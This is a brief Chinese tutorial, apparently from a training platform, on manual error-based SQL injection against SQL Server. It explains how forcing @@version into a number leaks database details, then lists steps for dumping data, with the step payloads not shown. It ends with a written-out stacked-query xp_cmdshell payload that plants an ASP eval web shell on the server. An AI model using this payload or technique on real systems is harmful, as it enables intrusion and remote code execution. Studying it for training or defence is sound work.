mssql手工注入

mssql注入是针对于sql server数据库的

sql server数据库和mysql数据库是有所区别的，语句命令之类的可自行百度。

 

平台：i春秋

内容：mssql手工注入

测试网站：www.test.com

 

找注入点

点击test

 

 

用数据类型转换爆错法

查看版本

 

 原因：＠＠version是mssql 的全局变量，如果我们把它写成这样 and @@version， 那个后面的mssql就会强行把@@version 强行转换成数字，但是失败，所以就会将数据库信息暴露出来

 

爆当前数据库名

 

 

爆表名

 

 

 

爆列名

 

 

 

爆字段内容

 

 

 

Mssql基本注入成功

 如果数据的权限是dba，且知道网站路径的话，那么我们就可以用这个语句来写一句话小马进去：
id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--

原理是sql server 支持堆叠查询，利用xp_cmdshell 可以执行cmd指令,cmd指令中用【echo 内容 > 文件】 可以写文件到磁盘里面